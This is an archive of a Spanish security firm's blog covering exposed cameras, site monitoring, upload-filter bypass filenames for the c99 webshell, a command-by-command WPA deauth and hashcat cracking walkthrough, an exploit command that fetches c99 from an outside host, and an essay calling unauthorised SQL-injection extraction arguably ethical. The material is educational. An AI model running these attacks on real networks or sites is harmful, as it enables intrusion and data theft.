Category Archives: Hacking Ético

  • 0

Miles de camaras de vigilancia de todo el mundo “hackeadas”

 

www.insecam.cc

Hay un sitio muy curioso en Internet www.insecam.cc donde se pueden ver miles de cámaras web “hackeadas”. Lo pongo entre comillas porque en realidad son cámaras web con una seguridad nula o passwords por defecto. Solo de España, hay registradas más de 370 cámaras de vigilancia de este tipo en esta web.

Estas cámaras están instaladas tanto en lo que parecen negocios particulares como interior de hogares. Desconocemos si los dueños de estas cámaras son conocedores de esta situación. Por favor si alguien identifica un sitio debería comunicárselo a esa persona lo antes posible.

 

 

El FAQ de insecam viene a resumirse en esto:

  • Por supuesto es sitio web dará inmediatamente de baja el streaming en cuanto usted así se lo indiquen.
  • Este sitio solo colecciona cámaras de videovigilancia y de grabación digital, no de webcams o dispositivos usb.
  • Estas cámaras no han sido hackeadas, por alguna razón sus dueños han dejado las passwords por defecto

Hay que reconocer que tiene sentido el que ellos mismos consideren que no han sido hackeadas, ya que ningún mecanismo de seguridad ha sido violado. Simplemente la puerta se abre, porque estaba mal cerrada.

¿Tiene usted una cámara de videovigilancia?

Tiene usted una cámara web de vigilancia , quizás sea posible usted desconoce que realmente se está publicando en Internet parte de su vida privada o el interior de su negocio, vivienda, etc.
www.insecam.cc/cam/bycountry/ESSelección_001

No queremos asustar a nadie, pero tristemente, es buena idea securizar este tipo de cámaras. Tiene que estar atento por que muchos cacos podrían obtener información muy importante sobre usted, su negocio o empresa, de una forma demasiado cómoda para ellos, ya sea  desde su casa o desde el sofá. A partir de esos datos pueden estudiar su comportamiento y su costumbres cotidianas para asaltar su casa o su negocio en el momento más propicio.

Desde TeamSec recomendamos el uso para la protección de estos sistemas y somos especialistas en ellos, pero su mala configuración y uso pueden conseguir el efecto contrario. Los sistemas de videovigilancia son un elemento muy importante en la seguridad física de cualquier empresa, aun así, una mala instalación o configuración pueden hacer que este elemento no cumpla sus objetivos. Estaremos encantados de asesorarle.


  • 0

Monitorizar nuestro blog/web usando Google Alerts

Imaginémonos que disponemos de un blog o una web y que queremos que esté monitorizada para evitar que nos metan algún tipo de malware, o simplemente modifiquen alguna página de las creadas, o en general cualquier tipo de cambio que se pueda hacer en las páginas que tenemos. Pero claro, no disponemos de los medios, tiempo o cualquier excusa, para montar una arquitectura de monitorización. Porque al final son plataformas caras que no siempre compensan para una única pagina web.

Existe una herramienta que nos puede ayudar a solventar este problema. Nunca será como montar un sistema que nos avise cuando se produce el hecho, pero sí  tendremos por lo menos algo a lo que prestar atención. Y como se suele decir, mejor tener algo que nada.

Esa herramienta es una funcionalidad de Google que se llama Alerts “https://www.google.com/alerts”. Esta herramienta de Google está enlazada con nuestra dirección de correo de gmail. Se configura creando Alertas como las llaman ellos o Búsquedas en su web, y nos avisa cuando recibe una nueva página que cumple con la ocurrencia. Dicho en otras palabras cuando una página con lo que digamos que monitorice se mete en el buscador de Google, nos enviará un correo con un enlace a esa página.

Lo primero que debemos hacer es entrar en la página de Alertas de Google para crear una alerta. El enlace está en el párrafo anterior. Nos saldrá una pantalla en la que aparece lo siguiente:

Figura 1: Pagina donde se define la búsqueda en Google Alerts.

Figura 1: Página donde se define la búsqueda en Google Alerts.

En ese formulario es donde definiremos la búsqueda o alerta que nos enviará Google cuando encuentre una página.

En nuestro caso, por ejemplo, queremos monitorizar este blog, además tenemos que comprobar que no añaden malware bancario, o similar. La búsqueda podría ser algo así:

site:teamsec.es gmail OR Dropbox OR Amazon OR PayPal OR Deutsche OR Postbank OR Google OR RBC OR Sparkasse OR Poste OR Italiane

La explicación:

  • site: indicamos el dominio del blog o dirección donde se buscarán las entradas (ejemplo: teamsec.es)
  • <palabra de búsqueda>: buscará esa palabra en las nuevas páginas que indexe.
  • OR: enlazamos palabra por palabra para que la búsqueda sea algo así “envíame un correo si encuentras las palabras <palabra1> o la <palabra2> o […] que estén en las páginas del sitio teamsec.es”

Si escribimos la búsqueda en el formulario, deberemos pulsar seguidamente en “Show Options”, “Mostrar Opciones” o similar. Nos aparecerán las opciones de búsqueda, si solo buscaremos en paginas en Ingles, español, etc, cada cuanto enviará la alarma, etc.

Figura 2: Opciones de definición de Alerta en Google.

Figura 2: Opciones de definición de Alerta en Google.

La recomendación es que en las opciones nos envíen un correo cuando pase la alerta (opción 1), que las fuentes sean “automáticas” (opción 2), que sea cualquier idioma (opción 3), cualquier región (opción 4), que envíe todos los resultados (opción 5). Quedaría algo así.

Figura 3: Resultado con las recomendaciones de la alerta de motorización.

Figura 3: Resultado con las recomendaciones de la alerta de motorización.

Sólo falta pulsar sobre el botón de “Create Alert” y se creará la alerta para la búsqueda que hemos especificado. Ahora cada vez que el motor de búsqueda de Google cachee una página con esas palabras me enviará un correo electrónico indomesticado.

Como hemos visto es una manera sencilla y barata de monitorizar cambios en un Web o blog.

 


  • 0

Hacking con imágenes 2

En un post anterior se describió un posible ataque a través de imágenes bmp, esta vez vamos a hablar de otro tipo de ataque pero también a través de imágenes. La diferencia es que, esta vez, el ataque es del lado del cliente y/o servidor que funciona con imágenes de tipo jpg.

El peligro puede venir de parte del lado del servidor, siempre que en una web exista algún método de subir una imagen jpg. Este problema es muy típico que en foros y otros sitios web donde el usuario tiene permitido subir imágenes y compartirlas con los demás usuarios.

A grandes rasgos el problema se produce al no comprobar el servidor si la “supuesta” imagen que sube el usuario es en realidad una imagen.

Vamos a ver como se puede aprovechar las medidas que se usan para comprobar el código fuente del lado de un servidor, en el siguiente codigo vemos que el servidor comprueba si el tipo del fichero subido es “image/jpg”. Veamos un ejemplo:

<input name="fileToUpload" type="file" onchange="check_file()" >
if($_FILES['userfile']['type'] != "image/jpg")

Muchas veces los programadores utilizarán un código similar que  hace lo que se supone debe hacer, checkea el archivo para comprobar la extensión de lo subido. Lo malo es que si solo hace la comprobación del tipo de archivo al que se refiere se puede truncar esta medida de comprobación cambiando por ejemplo la extensión del archivo.

Por ejemplo, en programación esto definiría los tipos de extensiones permitidas.

$valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");

Hay que tener muy en cuenta la hora de filtrar las entradas de usuario que pueden reportar un comportamiento distinto al esperado e implementarlo a través de la programación.

Funciones como strrchr dan mucho juego pues puede ser utilizado para que se consiga baypassear esta comprobación.

$file_extension = strrchr($_FILES["file"]["name"], ".");

Ejemplo de posibles intentos que en muchos casos pueden llegar a funcionar, al subir una imagen a una web que solo comprueba alguna función del tipo strrchr. Con imaginación , alguien maliciosamente podría testear funciones e intentar subir una webshell como c99. Tenemos un ejemplo de este tipo en la siguiente URL http://www.php.net/manual/en/function.strrchr.php

c99.jpg.php – Es posible que llegue a satisfacer la subida del jpg

c99.jpg.PhP – Ofuscación.

c99.php;.jpg – A veces puede ignorar lo que hay detrás de un ;

c99.php.test – Puede ser que se ignore .test

c99.php.xxxjpg – Es posible que invalide el final xxxjpg por invalido

De nuevo, para explotar este tipo de vulnerabilidad, necesitaremos de algo que convierta una imagen esta vez jpg, en una webshell con código malicioso. Esta herramienta nos permite utilizar el espacio de de los metadatos que contiene un jpg para insertar ese código. Simplemente genial.

http://kaoticcreations.blogspot.co.uk/2013/10/ohno-evil-image-builder-meta-manipulator.html

Desde el punto de vista de la programación cada vez más, se están estableciendo unos patrones de metodología de control del desarrollo de la aplicación a nivel de la seguridad. Existen una serie de metodologías que ayudan a realizar ese tipo de comprobaciones. Entendemos que esto es algo que no debe estar resumido en una API de control de usuarios, sino como parte de una rutina que el programador debe asumir además como llevar un control de excepciones (exceptions, errors, etc) que pueda reportarle la aplicación. Se puede resumir en no dejar cabos sueltos, ya que el no tratarlos correctamente puede terminar por convertirse en una vulnerabilidad y ser explotada.

Por todo ello es recomendable que para cualquier proyecto existan una serie de protocolos, metodologías, asesores que guíen en todas las fases de vida de dicho proyecto desde el punto de vista de la seguridad. Cuanto antes se introduzcan expertos o metodologías de seguridad en un proyecto ayudara a que los costes de los cambios sean mínimos si lo comparamos con los costes que se pueden dar en, por ejemplo, reestructurar una herramienta para implementar contramedidas para que los “usuarios” no suban ficheros que no debieran.

Recordar que la seguridad es una lucha de todos, tanto de los que prestan los servicios (web, programas, etc) como del usuario. La seguridad debe de ser proactiva por ambas partes.

Nuestra empresa estará encantada de ayudarles en sus proyectos de seguridad con un grupo de profesionales altamente cualificados que darán soluciones a sus problemas y necesidades

 

 


  • 0

  • 0

Damn Vulnerables Applications

Vamos a hacer un pequeño repaso de algunas herramientas para los que quieren comenzar con el pentesting sin meterse en “líos” y sin complicaciones, ya que, en su mayoría son live cds que podemos arrancar en una máquina virtual. Esto nos permitirá adecuar el escenario en el que vamos a realizar la auditoría, normalmente un ordenador en el mismo rango de ip que el auditor y con su consentimiento ya que es él mismo.

 

Hacking de aplicaciones Web
dvwaDVWA

DVWA Es una web escrita en PHP que nos ofrece un montón de vulnerabilidades por explotar, entre otras, fuerza bruta, SQLi, SSX, etc. Es muy fácil de instalar puesto que tiene una versión livecd o bien podemos publicarla en un servidor web propio. Nos permite configurarla en 3 niveles de dificultad. Está aplicación es genial si lo que se quiere es entender la mecánica de la obtención de datos a través de inyecciones SQL y además ver en vivo como funciona.

webgoat

WebGoat
Ya había mencionando a WebGoat en un artículo anterior sobre OWASP. Esta aplicación incluye incluso más vulnerabilidades que la anterior y por lo tanto más exhaustiva, funciona en cualquier sistema operativo que permita instalar una máquina virtual de java, ya que está escrito en dicho lenguaje.

Hay muchas otras aplicaciones con vulnerabilidades que podemos encontrar por internet, ya sea en forma de livecd o de página web. Hay numerosos grupos de hackers y expertos en seguridad que las publican para que los novatos practiquen y/o incluso ingresen a sus grupos, si superan los retos correspondientes.

 

Hacking iOS

dvwiosDVIA
Para testear tus skills en hacking de sistemas iOS  en varios aspectos de la seguridad, como puede ser el almacenamiento inseguro o la detección del jailbreak entre otros tantos. Todos basados en vulnerabilidades ya parcheadas de iOS, pero que no deja de ser interesante por ello.

 

Hacking en sistemas linux

hacking_dojo
Hacking dojo
Hacking dojo es una web que ofrece servicios de instrucción en cuanto al pentesting, e-learning en 5 niveles, de novicio a más avanzado.
En esta web podrás encontrar varios live cd muy interesantes, cuando los arrancas, en ellos se encuentran normalmente instalado un servidor web donde indica cual es el objetivo que tenemos que lograr. Estas distribuciones vulnerables están basadas en linux y exigen conocimientos sobre algunos aspectos del sistema, pero a su vez nos embarcará en una serie de retos muy interesantes que nos obligarán a pensar “out of the box” y enfrentarnos al escenario típico de un servidor al que queremos sacar la clave del root.


  • 0

Crackeando WPA con Hashcat.

Crackeando WPA con Hashcat

logo

Uno de los principales inconvenientes a la hora de desencriptar claves WPA es el tener que depender de un diccionario o las rainbow tables para poder obtener la ansiada contraseña. Esta práctica en muchos casos deja el password “indescifrable” por no dar exactamente con la palabra, en otros casos como son los hashes MD5, tenemos software que aplica todas las combinaciones posibles incrementando el numero de caracteres que se van probando hasta dar con la clave, como por ejemplo John the ripper o Hashcat.
En este caso hablaremos de hashcat y de los ataques de fuerza bruta a handshakes de WPA/WPA2. El handshake (apretón de manos) es el paquete que contiene el hash de la clave WPA/WPA2 de una red wifi. La opción más común es atacar mediante un diccionario, pero estamos sujetos a que la palabra de la clave figure en el diccionario, y se termina por tener mucho espacio en disco ocupado por estos ficheros. Una alternativa es un ataque de fuerza bruta, probando una a una todas las combinaciones posibles hasta dar con la correcta. En el caso de las claves WPA hay que tener en cuenta la posible longitud de la clave, ya que si es WPA2 sabemos que podemos tener el doble de caracteres que podemos encontrar en WPA, en esta clase de ataques, una buena gestión de contraseñas de la red inalámbrica puede ser decisiva a la hora de frustrar un ataque de estas características.
Para comenzar, usaremos la suite de aircrack-ng para extraer el handshake. Primero ponemos nuestra interfaz wifi en modo monitor:

# airmon-ng start wlan0

Hashcat_airmon-ng

Una vez hecho esto nos pondrá el interfaz wlan0 en modo monitor, creando el interfaz mon0. Ahora debemos ver qué redes están circulando a nuestro alrededor, para ello usaremos airodump-ng, este programa de la suite aircrack es el encargado de guardar las capturas de red que necesitamos analizar para extraer la clave, a diferencia de las redes con seguridad WEP, las redes WPA no requieren que almacenemos IV’s para poder averiguar la clave, en este caso sólo necesitamos capturar un paquete, el handshake.

Primero ejecutamos airodump-ng sin guardar y observando todos los canales para seleccionar el objetivo, abrimos una nueva shell y escribimos:

# airodump-ng mon0

Hashcat_airodump_primero

Nos convendría un punto de acceso en el que tuviésemos un cliente asociado, así podemos hacer el ataque de desautenticación y provocar la reconexión para capturar el handshake de la red en cuestión. Anotamos las direcciones MAC tanto del punto de acceso como del cliente que queremos desautenticar.
Ahora ejecutamos airodump con las especificaciones para el punto de acceso que hemos elegido:

sudo airodump-ng --bssid a4:5X:XX:XX:XX:XX --write ~/Escritorio/POCwpa --output-format pcap mon0

Una vez hecho esto lanzamos el ataque de desautenticación y esperamos la reconexión del cliente para que airodump capture el handshake.

# aireplay-ng -0 10 -e Apio -a a4:5X:XX:XX:XX:XX -c 00:EX:XX:XX:XX:XX --ignore-negative-one mon0

Hashcat_aireplay_DeauthAttack

Una vez que vemos que ha capturado el handshake nos lo indicará en la equina superior derecha de la consola.

Hashcat_airodump_handshake_capturado

Ahora que tenemos el handshake capturado tenemos varias posibilidades de transformar el archivo a un formato legible para hashcat. Como primera opcion tenemos la web de hashcat, que nos proporciona una utilidad online para transformar nuestros archivos .pcap en .hccap.
Como segunda opción nos podemos descargar el software necesario para ejecutarlo en nuestro linux, en este caso debemos compilarlo, para ello nos descargamos el software en este enlace  y seguidamente lo descomprimimos.

Esto nos creará un directorio con el mismo nombre del archivo que hemos descomprimido, ahora ingresamos en el directorio y compilamos el programa.

Si diese algún problema de dependencias tan sólo debéis instalar las librerías que necesitéis, en tal caso, toca pelearse con la consola >;-)

Una vez instalado, usar el programa es de lo más sencillo, simplemente tenemos que darle el archivo de entrada y el archivo de salida, como figura en el siguiente ejemplo:

./cap2hccap.bin ~/Escritorio/POCwpa-14.cap ~/Escritorio/HandshakeApio.hccap

Esto nos dejará el archivo preparado para que le pasemos por encima el hashcat.

./hashcat-cli64.bin -m2500 -a3 -n2 --pw-min=20 ~/Escritorio/HandshakeApio.hccap.cap ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a

Modificadores:

-a Indicamos el modo de ataque, en este caso 3 indica fuerza bruta.

-m Indicamos el tipo de hash, en este caso WPA/WPA2 se corresponde al 2500.

?a?a?a?a?a?a?a Indicamos la máscara, en este caso ?a significa que buscará numéricos, mayúsculas, minúsculas y especiales, escribiendo ?a de forma consecutiva le estamos indicando la longitud máxima de carateres que va a probar. Saber manejar la máscara de hashcat nos ayudará a concretar un poco qué tipo de caracteres estamos buscando dentro del password, por ejemplo:

Dado el password Habichuela**

Una máscara adecuada sería ?u?l?l?l?l?l?l?l?l?l?s?s, así limitamos con ?u la búsqueda a mayúsculas sólamente, con ?l buscamos minúsculas y con ?s buscamos caracteres especiales, de tal forma no tenemos que buscar una mayúscula en las dos últimas posiciones. Para el caso del wireless podemos ver como algunos puntos de acceso tienen por defecto claves numéricas o alfanuméricas, por tanto podríamos podríamos ahorrar bastante tiempo si quitamos de las combinaciones posibles los caracteres especiales.

Una vez esté trabajando hashcat podremos darle a enter y ver el progreso.

Hashcat_Proceso


  • 0

OWASP

Tags :

owaps

La fundación OWASP, es una fundación nacida en el año 2004 con objeto de mejorar la seguridad en el software. Mayormente esta fundación se dedica a difundir información para mejorar la seguridad, ya sea a través de sus publicaciones, libros, conferencias, cursos y otro tipo de eventos. Es una comunidad que se rige por varios principios:

Libre y Abierto
Gobernado por consenso
Cumplir con un código ético
Sin ánimo de lucro
No impulsada por intereses comerciales
Enfoque basado en el riesgo

 
 
 
 

Entre sus proyectos locales encontramos:

– Evaluación de la seguridad del DNIe (dni electrónico)

https://www.owasp.org/index.php/Spain/Projects/DNIe

– La especificación de los requisitos legales para aplicaciones web en España.

Identificación de las leyes y reglamentos que pueden afectar a la especificación de requisitos de una aplicación Web

https://owasp.org/index.php/Spain/Projects/Requerimientos_Legales

OWASP reune una gran cantidad de proyectos que están siendo desarrollados en los que encontramos utilidades para la mejora de la seguridad, tales como validadores de formularios para javascript, JSON, etc. y todo tipo de herramientas que dan al desarrollador control sobre lo que hace, normalmente bajo un principio: Se conservador en lo que tu haces, pero se liberal con lo que aceptas de los demás.

Básicamente nos viene a decir que no pierdas el control de lo que estás programando sin restringir en exceso la libertad del usuario. Sobre todo a la hora de validar los datos de entrada de una aplicación, que es mayor foco de vulnerabilidades normalmente.

Entre sus proyectos estrella encontramos OWASP Enterprise Security API, un conjunto de APIS que nos permitirán validar la fiabilidad de nuestro código fuente, ya sea PHP, .NET, python, java, javascript o asp. Muy interesante para alguien que quiera desarrollar código fuente reforzando aspectos de la seguridad.

https://owasp.org/index.php/File:OWASP_Classic_ASP_ESAPI.zip

Además sus tres herramientas más conocidas:

OWASP Web Testing Enviroment Project – Un live CD con las herramientas y la documentación necesaria para comenzar a utilizar OWASP

OWASP WebGoatProject – Es un proyecto web insecuro (a propósito claro) para poder hacer pruebas de pentesting. Está diseñado para probar y divulgar lecciones de seguridad.

OWASP Zed Attack Proxy – Es una herramienta para testear la seguridad de las páginas web, proporciona los escáneres necesarios para detectar vulnerabilidades.

En resumen OWASP es una comunidad abierta y libre sobre la seguridad en aplicaciones, que contiene un montón de proyectos, algunos bien conocidos por los hackers como joomscan.

Además sus libros realmente nos parecen bastante asequibles en cuanto a precio y muy interesantes.

http://www.lulu.com/spotlight/owasp


  • 0

C99.php, rootkits en la www

rootkit-623x409C99.php­

C99.PHP es un una herramienta diseñada para ejecutarse en un servidor apache, es una página web. escrita en PHP, que podríamos definir como el equivalente web de un rootkit. Proporciona funcionalidad para ejecución de comandos del shell del sistema, listar los archivos, acceso al servidor de base de datos, FTP brute force, además de la actualización de sí mismo. Hay otras utilidades equivalentes, la más famosa 57shell.php.

Una vez el atacante en cuestión a aprovechado alguna vulnerabilidad del sistema donde se aloja la una página web, para introducir en el mismo directorio, una página “escondida*” con el nombre c99.php, por ejemplo. esta se puede utilizar para manejar el contenido de la misma, pudiendo ver el contenido de los archivos, dumpear la base de datos, hacer consultas SQL, subir archivos, modificarlos, etc, dado que es una interfaz sencilla y de fácil manejo que permite en pocos minutos extraer la información de la página web o modificarla a gusto.

Vamos a hacer un repaso de lo fácil que es extraer la información de la página , suponiendo, que se consigue vulnerar el sistema. Para el este ejemplo, vamos a suponer un exploit en perl, que nos concediese una ejecución remota de comandos en la shell del sistema del servidor web de la página.

#root/: ./exploit.pl –exec “cd http && wget http://www.sh3ll.org/c99.txt? && mv c99.txt c99.php –url=”una-web-atacada.com”

Selección_001

Selección_002

Como se ve aprecia nuestro exploit de alguna forma consigue engañar al servidor web, a través de algún fallo y logra ejecutar esos comandos en el sistema atacado, de esta forma se instala una página que el servidor apache servirá a cualquier cliente que se conecte a ella, siempre y cuando los permisos sean los adecuados o modificables.

Mostrando la interfaz de c99.php,

La interfaz inicial muestra el nombre del servidor, la versión de sistema operativo, el contenido del directorio local y varios controles para ejecutar comandos y subir, bajar o manipular los archivos, pudiendo ver su contenido y navegar por los directorios del sistema, siempre y cuando los mecanismos de seguridad del sistema nos lo permitan.

Una vez aquí, podremos en muchos casos recurrir al muy usual error de los administradores de no proteger el archivo configuration.php con lo que como muestra la imagen podremos acceder a su contenido y apuntar la clave del usuario de la base de datos, que podremos usar en la pestaña SQL.

Selección_003

La pestaña SQL, tras introducir el usuario de la base de datos y su contraseña, como es lógico, nos permitirá acceder a los contenidos de la base de datos y ejecutar todo tipo de consultas SQL, así como hacer dump de la base de datos y visualizar el contenido de las tablas. Esto también incluye la tabla usuarios que es la más sensible de todas, dado que en ella se almacenan las contraseñas de los usuarios. Y con esto ya se ha completado una intrusión que podría significar una posible pérdida o fuga de datos, más o menos grave.

Selección_004

Para ahondar un poco más en las posibilidades de c99.php, vamos a describir la pestaña de FTP brute force, esta sirver para hacer un ataque por fuerza bruta al ftp del servidor de la página web si existiese, intentando romper la password de los usuarios existentes, esto puede ser especialmente sensible si se marca la opción shell users.

Las pestañas Proc, Self Remove y Feedback se explican por sí mismas, proc sirve para ver los procesos que el servidor esta ejecutando, self remove, elimina la página de c99 y la última para reportar la vulnerabilidad al foro oficial de c99.

Selección_005

Desde TeamSec queremos advertir que hemos encontrado páginas con más de una página c99 en distintos directorios y con distintos nombres de fichero.

*1 Muchos administradores de páginas webs son simples usuarios cuyos conocimientos sobre el funcionamiento del servidor apache no son profesionales, no percatándose en muchos casos que hay directorios, como los directorios temporales, típicos /tmp o /chache, que albergan la ruta donde el servidor, da acceso a la página y en muchos casos desconocen que esos directorios son los que realmente publica el servidor, tampoco tienen porque saberlo, no obstante cualquier administrador que no se percate de la presencia de estos archivos en dichos directorios está posiblemente exponiendo datos que pudieran ser privados de las personas registradas en la web.

Pablo Martínez, TeamSec

 

 

 

 


  • 0

Ética hacker

Tags :

Category : Hacking Ético

La ética hacker es una nueva ética surgida de y aplicada a las comunidades virtuales o cibercomunidades, aunque no exclusivamente.

La expresión se suele atribuir al periodista Steven Levy en su ensayo seminal Hackers: Heroes of the Computer Revolution, publicado en 1984, dónde describe y enuncia con detalle los principios morales que surgieron a finales de los años cincuenta en el Laboratorio de Inteligencia Artificial del MIT y, en general, en la cultura de los aficionados a la informática de los años sesenta y setenta. Aquellos principios –que se resumen en el acceso libre a la información y en que la informática puede mejorar la calidad de vida de las personas– han constituido la base de la mayor parte de definiciones que se han elaborado posteriormente. Uno de sus mentores actuales ha sido el finlandés Pekka Himanen.


  • 0

Sobre la ética hacker, la auditoría de seguridad o el mal llamado “Hacking ético”

sombreros_hackerLarga es la discusión para definir el término hacker.., En España por ejemplo todavía existe la idea del pirata informático, cracker o maligno creador de virus como tal. No obstante sabemos que España es uno de esos paraísos donde la mal llamada piratería siempre ha campado a sus anchas. Las cintas de cassette de los 80, los cds de los 90 y las leyes contra la “piratería” inventadas en los últimos tiempos, son claro ejemplo de que a España siempre le ha gustado hackear los sistemas  o que no le ha quedado otra a sus ciudadanos para llegar a la información.

En algunos casos se han escuchado auténticas barbaridades como que todos los hackers son delincuentes, por no hablar del agravio comparativo de lo que supone un delito de lesiones, sangre, violación, secuestro, etc con los que a veces se compara las tropelías ejercidas, eso sí, por ciberdelincuentes, cuyo mayor delito, en muchos casos, no es más que apropiarse de una información que en teoría no les pertenece. Un militar está entrenado para matar, sin embargo no llamamos asesinos a los militares, está lógica no se aplica mayormente a los hackers.

Esta asociación entre conocimiento y aplicación del mismo ha hecho que el termino hacker este asociado especialmente en nuestro país con la delincuencia electrónica y aún más ahondando en la interpretación psicológica que nos dice que lo desconocido siempre a causado respeto y temor haciendo que los hackers sean definidos, o bien entre los héroes o bien entre los villanos.

La verdad es que la percepción sobre los hackers está gravemente influenciada por las películas de Hollywood, donde el hacker es un malvado ciberdelincuente que se cuela en el ordenador de la CIA y anula los sistemas satelitales y de defensa o bien, es un joven superdotado que salva al mundo de un peligro electrónico o de anterior.

La ética y el hacking. De todos es conocido que muchas de las cosas que hacen los hackers rozan con la ética. Así pues, en su mayoría son conocimientos adquiridos que aplicados de una forma no esperada, pueden hacer que un sistema se comporte de una forma de la que se puede sacar alguna aplicación a un fallo como la fuga de información. Así pues, podemos hacer hacking de todo tipo, desde hackear una máquina de refrescos, abrir un candado sin una llave, o modificar una página web, esto también son consideradas formas de hacking.

Como se habrá podido sobreentender del párrafo anterior, todas estas acciones sobre sistemas pueden chocar con la ética de las personas, sobre todo , si eres el dueño de la máquina, del candado de la bici o el administrador de la web en cuestión. Es aquí donde entre la ética del hacker.

Como es nuestra especialidad nos centraremos en este caso de la página web, imaginemos, por ejemplo, que el hacker es en realidad, un simple estudiante probando técnicas de hacking de una vulnerabilidad web. Su intención probablemente será comprobar que la página es vulnerable a una inyección SQL y trataría de extraer información. Sus intenciones no son tan malas, si no hace mal uso de la información que pudiese extraer, por ejemplo si después de extraer los datos, simplemente se siente contento y los borra, esto podría considerarse un comportamiento ético dentro de lo razonable y siempre y cuando no tenga otra motivación que el propio logro.

En otro escenario un hacker que está en contra por ejemplo de los gustos musicales de los usuarios de un foro web sobre música y decide borrar todos los comentarios. En este caso, tenemos que efectivamente su intención es de hacer daño y destruir información. Claramente sus intenciones chocan con la ética.

En ambos casos muchos se supondrán el problema ético del acceso no deseado a la página web, pero realmente es un dilema estúpido que no beneficia en absoluto a la seguridad de los propios sistemas. Lo importante realmente es que alguien a podido saltarse los mecanismos de seguiridad y que podría volver a pasar y las consecuencias que pueden ocurrir a raiz de ello.

No obstante cuando Anonymous atacó la página de Lolita city, conocida web pedofila de la darknet, fue considerada una acción ética, y en absoluto se puso en entredicho la legitimidad de los métodos empleados, sino la finalidad de los mismos. Esto choca frontalmente con la idea de el “hacking ético” que se define como una auditoría de hacking consentida por la parte interesada en llevar a cabo dicha auditoría, pues en este caso se realizo una auditoría sin consentimiento.

Muchos gobiernos han puesto auténticas leyes represivas sobre los accesos a sistemas, que además suponen además un grave peligro para su propia seguridad. Una nación sin jóvenes con educación en la penetración de sistemas y en el conocimiento de estas técnicas puesto que sufren el temor de ser arrestados o perseguidos por la justicia y además penados gravemente si lo hacen, no tendrá defensa ante los ciberdelincuentes, que sí se han enfrentado a diferentes sistemas y escenarios donde conocerán las vulnerabilidades de los mismos. La ciberseguridad se esta convirtiendo en uno de los pilares de las telecomunicaciones. Tanto es así que nos resulta chocante que a medida que ha aumentado la persecución a simples aprendices de hackers que escanean redes y puertos, también ha ido aumentando el número de noticias que indican el constante espionaje al que estamos siendo sometidos por los propios gobiernos e sus instituciones como son los continuos escándalos de EEUU a través de la NSA, curioso es, que en EEUU esté considerado delito el escaneo de puertos.

La la auditoría de seguridad informática, o mal llamado “hacking ético” es estrictamente aquel en que la parte interesada en realizar la auditoría, da su consentimiento al auditor, para que ponga a prueba sus sistemas y de esa forma buscar los puntos débiles de los mismo para intentar mejorar la seguridad de estos. Insisto mal llamado hacking ético porque la seguridad no tiene nada que ver con la ética, la seguridad informática no difiere en absoluto con cualquier otro tipo de medidas de seguridad, ya sea poner una cerradura o una alarma.

El dilema ético de si te puedo abrir el candado o no, es estúpido, porque yo quizás pueda abrírtelo, pero vendrá otro que además de abrirlo, se llevará la bicicleta. Muchas veces se mata al mensajero y no el mensaje.

Pablo Martínez, TeamSec